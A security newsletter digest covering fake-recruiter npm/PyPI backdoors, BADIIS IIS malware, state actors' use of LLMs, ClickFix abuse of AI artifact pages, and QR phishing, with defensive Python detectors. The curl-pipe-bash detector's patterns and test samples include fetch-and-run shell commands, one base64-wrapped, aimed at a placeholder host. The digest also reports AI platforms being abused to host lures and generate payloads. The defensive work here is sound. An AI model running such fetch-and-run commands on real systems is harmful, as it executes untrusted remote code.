EvilBit Threat Digest - QR Codes, Poisoned Packages, and AI With a Side Hustle

Weekly briefing on how attackers abuse trust layers such as package registries, QR codes, AI platforms, and search ads to breach supply chains.

Sunday check-in. KryptoKat called in sick, so I'm flying solo this week. Let's see how attackers are still finding new ways to punch holes in all the trust band-aids we've stuck on the internet: package registries, QR codes, AI platforms, sketchy search ads, and those forgotten IIS servers nobody wants to admit they still run.

This week isn't about shiny new zero-days. It's about distribution. Attackers are getting creative with how they deliver the same old payloads, and the blast radius just keeps getting bigger.


Supply Chain Theater: Fake Recruiters and npm/PyPI Backdoors

North Korea's Lazarus Group is back to doing what they do best: turning human ambition into initial access. In a campaign dubbed "graphalgo" by ReversingLabs, attackers posed as recruiters targeting crypto developers, ultimately pushing malicious npm and PyPI packages as part of fake "technical assessments" (Fake recruiter campaign targets crypto devs).

The flow is clean:

  1. Fake recruiter reaches out via LinkedIn, Facebook, or Reddit.
  2. Candidate receives a coding task hosted in attacker-controlled GitHub repos.
  3. The task requires installing dependencies from attacker-controlled npm/PyPI packages.
  4. Packages deploy multi-language payloads (JavaScript, Python, VBS), leading to a RAT.

The scale is notable: ReversingLabs identified 192 malicious packages across both registries. One package, bigmathutils, racked up over 10,000 downloads while still benign before the attackers pushed a weaponized version. The payload chain includes token-protected C2 and behaviors aligned with prior Lazarus tradecraft, including cryptocurrency wallet targeting (yes, MetaMask again).

From a red-team perspective, this is just social engineering with a supply-chain flavor. Why waste a CVE when you can get a dev to pip install your malware for you?

For blue teams:

  • Treat newly created package publishers as suspicious by default.
  • Flag dev workstations reaching out to uncategorized domains shortly after package installation.
  • Monitor for unusual post-install scripts in package metadata.
  • Correlate recruiter outreach + repo access + dependency changes. That timeline matters.
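
One way to act on the post-install bullet and on the benign-then-weaponized pattern described above: diff a package's manifest against the last version you reviewed and flag install-time changes. This is an added example, not code from the ReversingLabs report; the package names, the sample manifests, and the RISKY heuristics are constructed assumptions.

```python
import json
import re

# npm runs these lifecycle scripts automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Assumed heuristics: an install step seldom needs to fetch or eval code.
RISKY = {
    "network fetch": re.compile(r"\b(curl|wget|Invoke-WebRequest)\b", re.I),
    "inline interpreter": re.compile(
        r"\b(node\s+(-e|--eval)|python3?\s+-c|powershell|wscript|cscript)\b",
        re.I),
    "encoded data": re.compile(r"base64|[A-Za-z0-9+/]{40,}={0,2}"),
}

def install_hooks(manifest):
    """Map hook name -> command for the hooks npm runs at install time."""
    scripts = manifest.get("scripts") or {}
    return {h: scripts[h] for h in INSTALL_HOOKS
            if isinstance(scripts.get(h), str)}

def review_update(old_text, new_text):
    """Diff two package.json versions; report install-time changes."""
    old, new = json.loads(old_text), json.loads(new_text)
    findings = []
    old_hooks = install_hooks(old)
    for hook, command in install_hooks(new).items():
        if old_hooks.get(hook) == command:
            continue  # unchanged since the version already reviewed
        reasons = [name for name, rx in RISKY.items() if rx.search(command)]
        findings.append(("install-hook", hook, reasons))
    old_deps = set(old.get("dependencies") or {})
    for dep in sorted(set(new.get("dependencies") or {}) - old_deps):
        findings.append(("new-dependency", dep, []))
    return findings

# Constructed sample: clean at 1.0.0, gains a hook and a dependency at 1.0.1.
OLD = json.dumps({"name": "example-mathutils", "version": "1.0.0",
                  "dependencies": {"example-base": "1.3.0"}})
NEW = json.dumps({"name": "example-mathutils", "version": "1.0.1",
                  "scripts": {"postinstall": "node -e \"require('./setup')\""},
                  "dependencies": {"example-base": "1.3.0",
                                   "example-helper": "0.0.1"}})

if __name__ == "__main__":
    for finding in review_update(OLD, NEW):
        print(finding)
```

Run it in CI against the lockfile's resolved versions so a patch-level bump that introduces an install hook or a new dependency gets a human look before it reaches a dev workstation.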

We finally got devs to stop opening random attachments, but nobody told them to watch out for dodgy 'homework' from fake recruiters.


IIS Is Still the Internet's Basement

Elastic Security Labs dropped a new analysis on the BADIIS campaign, which has compromised over 1,800 Microsoft IIS servers globally (BADIIS to the Bone).

This isn't your typical smash-and-grab ransomware. It's SEO poisoning turned up to eleven.

Attackers (tracked as REF4033 / UAT-8099) install malicious IIS modules and services that:

  • Hijack execution flow inside the web server
  • Manipulate HTTP responses
  • Redirect traffic to gambling, scam, and crypto monetization sites
  • Maintain persistence via rogue services and DLL side-loading

The sneaky bit: instead of dropping obvious web shells, they're hooking in at the module level. BADIIS loads directly into the IIS worker process, making it nearly indistinguishable from legitimate server activity. It inspects every incoming request, serving poisoned SEO content to search engine crawlers while showing clean pages to admins and regular visitors. Good luck spotting it unless you're looking for ghosts in the machine.

Detection opportunities:

  • Unexpected global modules in applicationHost.config
  • New or modified IIS services
  • DLLs loaded by w3wp.exe from non-standard paths
  • HTTP response anomalies that only trigger for specific referrers or user-agents (SEO fraud logic)
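
A sketch of the first check in that list: parse applicationHost.config and report global modules whose image path falls outside the directories you expect. This is an added example, not Elastic's tooling; the approved-directory baseline and the "Example*" entries in the sample config are constructed assumptions.

```python
import ntpath
import xml.etree.ElementTree as ET

# Assumed baseline: directories this estate expects native IIS modules to
# load from. Extend it with your own approved locations.
APPROVED_DIRS = (r"%windir%\system32\inetsrv", r"%programfiles%\iis")

def normalise(image):
    """Lower-case, unify %SystemRoot%/%windir%, and collapse '..' segments."""
    path = image.strip().strip('"').lower().replace("/", "\\")
    path = path.replace("%systemroot%", "%windir%")
    return ntpath.normpath(path)

def audit_global_modules(config_xml, approved=APPROVED_DIRS):
    """Return (name, image) for global modules outside approved directories."""
    flagged = []
    root = ET.fromstring(config_xml)
    for section in root.iter("globalModules"):
        for entry in section.findall("add"):
            image = entry.get("image", "")
            path = normalise(image)
            if not any(path.startswith(d + "\\") for d in approved):
                flagged.append((entry.get("name", ""), image))
    return flagged

# Constructed applicationHost.config excerpt; the "Example*" modules and their
# paths are invented for illustration.
SAMPLE_CONFIG = r"""
<configuration>
  <system.webServer>
    <globalModules>
      <add name="UriCacheModule" image="%windir%\System32\inetsrv\cachuri.dll" />
      <add name="AspNetCoreModuleV2"
           image="%ProgramFiles%\IIS\Asp.Net Core Module\V2\aspnetcorev2.dll" />
      <add name="ExampleHelper" image="C:\ProgramData\Example\helper.dll" />
      <add name="ExampleCache"
           image="%SystemRoot%\System32\inetsrv\..\..\Temp\cache.dll" />
    </globalModules>
  </system.webServer>
</configuration>
"""

if __name__ == "__main__":
    for name, image in audit_global_modules(SAMPLE_CONFIG):
        print(f"review: {name} -> {image}")
```

A path check alone passes a rogue DLL dropped into an approved directory, so pair it with a hash or signature baseline of the module files and a diff of the module list against the last known-good copy of the config.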

This campaign has been running since late 2023, with a heavy concentration in APAC (China and Vietnam account for roughly 82% of compromised servers). If you've got an IIS box nobody's watching, chances are someone's already freeloading on your bandwidth.

IIS is basically the NT 4.0 box in the closet. Nobody remembers setting it up, and everyone assumes it's someone else's problem.


AI as Co-Pilot, Not Overlord

Google's Threat Intelligence Group released a dense report on how nation-state actors are integrating LLMs into operations (GTIG AI Threat Tracker).

The headline: no AI superweapons yet. Just attackers quietly working AI into their daily grind.

Observed patterns:

  • APT42, APT31, APT41 using LLMs for phishing content refinement and reconnaissance.
  • AI-assisted malware development.
  • Model distillation and extraction attempts targeting Gemini APIs (over 100,000 prompts in one campaign).
  • Abuse of AI platform public-sharing features in "ClickFix"-style social engineering, including Gemini, ChatGPT, Copilot, DeepSeek, and Grok hosting deceptive content to deliver ATOMIC stealer on macOS.

Two notable malware families:

  • HONESTCUE: A downloader/launcher framework that sends prompts to Google's Gemini API and receives dynamically generated C# source code as its second-stage payload. The code is compiled and executed entirely in memory via CSharpCodeProvider, leaving zero disk artifacts. The AI-generated payload angle is the real finding here: traditional network signatures looking for known-bad downloads won't catch it because the malicious code is generated on demand through a legitimate, encrypted API.
  • COINBAIT: A credential-harvesting phishing kit masquerading as a crypto exchange, built using the AI-powered platform Lovable AI. GTIG attributes portions of the activity to UNC5356, a financially motivated cluster targeting clients of financial organizations.

Also worth mentioning: tools like Xanthorox, running on stolen API keys and abused MCP servers. Less 'Skynet,' more 'who forgot to rotate the creds?'

Operational takeaway:

AI is just making attacker workflows faster. It's not breaking the laws of physics.

Defenders should:

  • Monitor anomalous LLM API usage from internal hosts.
  • Watch for high-volume probing patterns that resemble model extraction.
  • Alert on in-memory C# compilation events tied to suspicious network activity.
  • Treat API keys like domain admin creds.

This arms race isn't about sentient AI. It's about who can automate faster and lazier.


ClickFix Goes Mac: Claude + Google Ads = Infostealer

The ClickFix technique from the GTIG section above is already being weaponized against specific platforms. A campaign reported by Moonlock Lab shows attackers abusing Claude AI's public artifact feature and Google Ads to distribute a macOS infostealer dubbed MacSync (Claude LLM artifacts abused to push Mac infostealers in ClickFix attack).

The chain:

  1. Malicious Google Ad targeting queries like "online DNS resolver" or "HomeBrew."
  2. Redirect to a Claude-hosted "artifact" page presenting fake troubleshooting instructions.
  3. Social engineering instructs the user to execute a base64-encoded terminal command.
  4. Command fetches and runs a loader for the MacSync infostealer.

Sound familiar? It's the same old ClickFix move: convince users to copy-paste random commands into a terminal because they think it'll magically fix their problem. Claude is one of several AI platforms being abused this way; Moonlock Lab and AdGuard observed over 15,000 users exposed across variants.

MacSync reportedly targets:

  • Keychain credentials
  • Browser-stored data
  • Crypto wallet artifacts

The clever part isn't the malware; it's abusing the platform. Host your instructions on a legit AI service and you get all the trust, none of the basic URL filtering.

Blue teams should:

  • Track command execution spawned shortly after browser activity involving AI platforms.
  • Monitor for unusual curl-pipe-bash execution patterns.
  • Treat "sponsored search result" traffic as a potential initial access vector in telemetry.
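
Detection logic for the curl-pipe-bash bullet, extended to the base64-wrapped form from step 3 of the chain: it tags process command lines and decodes inline base64 to see whether a downloader is hidden inside. This is an added example, not Moonlock Lab's detection; the tag names and sample command lines are constructed.

```python
import base64
import binascii
import re

SHELL = r"(?:ba|z|da)?sh"
# Downloader output piped straight into a shell interpreter.
PIPE_TO_SHELL = re.compile(
    rf"\b(?:curl|wget)\b[^|;]*\|\s*(?:sudo\s+)?{SHELL}\b")
# A base64 decode stage feeding a shell: `... | base64 -d | sh`.
DECODE_TO_SHELL = re.compile(
    rf"\bbase64\s+(?:-d|-D|--decode)\b[^|;]*\|\s*(?:sudo\s+)?{SHELL}\b")
B64_LITERAL = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
DOWNLOADER = re.compile(r"\b(?:curl|wget)\b")

def decode_literals(cmdline):
    """Decode base64 literals in a command line that yield printable text."""
    decoded = []
    for token in B64_LITERAL.findall(cmdline):
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not base64, or binary data rather than a command
        if text.isprintable():
            decoded.append(text)
    return decoded

def classify(cmdline):
    """Return sorted tags explaining why a command line deserves triage."""
    tags = set()
    if PIPE_TO_SHELL.search(cmdline):
        tags.add("download-piped-to-shell")
    if DECODE_TO_SHELL.search(cmdline):
        tags.add("base64-decoded-to-shell")
        # Look inside the encoded stage for a downloader hidden from grep.
        if any(DOWNLOADER.search(t) for t in decode_literals(cmdline)):
            tags.add("hidden-downloader")
    return sorted(tags)

# Constructed process command lines (example.invalid never resolves).
INNER_COMMAND = "curl -fsSL https://example.invalid/fix.sh | zsh"
SAMPLES = [
    "echo " + base64.b64encode(INNER_COMMAND.encode()).decode()
    + " | base64 -D | zsh",
    "curl -fsSL https://example.invalid/install.sh | bash",
    "curl -fsSL https://example.invalid/a.tgz | shasum -a 256",
    "base64 -d cert.b64 > cert.pem",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line), "<-", line)
```

Feed it command lines from EDR or unified-log process events; the last two samples show that a checksum pipe and a decode-to-file do not fire.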

Search ads are still the world's best malware CDN, just with shinier logos.


Quishing: QR Codes as Phishing Infrastructure

Palo Alto Networks Unit 42 detailed ongoing "quishing" campaigns leveraging QR codes to bridge email, web, and mobile phishing flows (Phishing on the Edge of the Web and Mobile Using QR Codes).

Why QR codes work:

  • They bypass secure email gateways that can't easily inspect embedded images.
  • They shift execution to mobile devices, often outside enterprise monitoring.
  • They obscure URLs behind user-initiated scans.

Observed tactics include:

  • URL shorteners to add another obfuscation layer.
  • In-app deep links to steal account credentials and hijack apps.
  • Direct APK downloads that bypass app store security for Android users.

Unit 42's telemetry shows an average of over 11,000 detections of malicious QR codes per day. The real trick is the cross-device move. Your SOC might catch the email, but it'll never see what happens when someone scans that QR code on their phone.

Key mitigations:

  • Integrate mobile device telemetry into SOC workflows.
  • Remind users: QR codes are just URLs in disguise, not some kind of magic square that makes things safe.
  • Block newly registered domains referenced in QR-based campaigns.

We finally got users to stop clicking sketchy links, so attackers just turned links into QR code geometry instead.


Patch Roundup: Linux Updates and a Chrome Zero-Day

Chrome Zero-Day: CVE-2026-2441

Google patched CVE-2026-2441 on Friday, a high-severity CSS use-after-free vulnerability in Chrome that is under active exploitation in the wild. If you haven't pushed the update yet, do it Monday morning. No excuses.

Linux Patch Wave: Nessus Plugin Updates

Tenable pushed extensive Nessus plugin updates across two releases this week, covering 12 February and 14 February (Nessus plugin updates).

Key CVEs highlighted include:

  • CVE-2026-26269 (Vim stack buffer overflow in NetBeans integration)
  • CVE-2026-23112
  • CVE-2026-2327 (markdown-it ReDoS)

Affected ecosystems span:

  • Ubuntu 22.04/24.04/25.10
  • SUSE Linux Enterprise 11/15
  • openSUSE 15
  • VMware Photon OS 5.0
  • HAProxy
  • OpenSSL
  • Linux kernel components

Impact ranges from denial-of-service to privilege escalation and potential remote code execution, depending on the package and configuration.

No flashy worms this time. Just the usual background noise: memory corruption, logic bugs, and service weaknesses that red teams love to chain together for fun and profit.

If your patching schedule is 'quarterly-ish,' congrats. You're basically making a donation to the attacker fund.


Closing Thought

Nothing this week required a groundbreaking exploit.

Instead, attackers leaned on human trust (recruiters, QR codes, ads), platform trust (AI artifacts, npm, PyPI), and legacy infrastructure (IIS, Linux services).

The real story isn't about fancy exploits. It's about leverage: who can get the most bang for their buck.

Back in 1995, it was buffer overflows in CGI scripts. Now it's QR codes in emails leading to fake AI troubleshooting pages that trick devs into installing sketchy Python packages. Progress?

Same old playbook. Just shinier props.

Patch your servers. Audit your dependencies. Rotate your API keys. And seriously, don't run random code just because someone waves a job offer in your face.

~ UncleSp1d3r (temporary KryptoKat stand-in)